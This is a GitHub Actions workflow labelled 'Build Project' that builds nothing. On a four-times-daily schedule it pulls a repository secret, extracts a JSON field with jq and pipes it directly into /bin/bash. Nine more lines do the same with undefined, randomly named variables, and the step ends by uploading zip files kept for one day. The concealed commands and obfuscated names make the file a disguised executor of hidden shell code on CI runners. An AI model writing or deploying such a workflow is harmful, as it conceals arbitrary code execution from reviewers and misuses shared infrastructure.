name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '51 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          s57: ${{ secrets.s57 }}
        run: |
          printf '%s' "$s57" | jq -r .tz25 | /bin/bash
          echo $tin01977 | jq -r .nkllc48214 | /bin/bash
          echo $oerc4620 | jq -r .j1 | /bin/bash
          echo $k8 | jq -r .ro4 | /bin/bash
          printf '%s' "$gtp701" | jq -r .rd07 | /bin/bash
          printf '%s' "$wxd363" | jq -r .oo823 | /bin/bash
          echo $qbq39642 | jq -r .s5333 | /bin/bash
          printf '%s' "$wvzdn58" | jq -r .kv53 | /bin/bash
          printf '%s' "$vcjda62" | jq -r .xigqh2 | /bin/bash
          printf '%s' "$wcn4922" | jq -r .zrrs67782 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: PlnnXCvY
          path: "*.zip"
          retention-days: 1
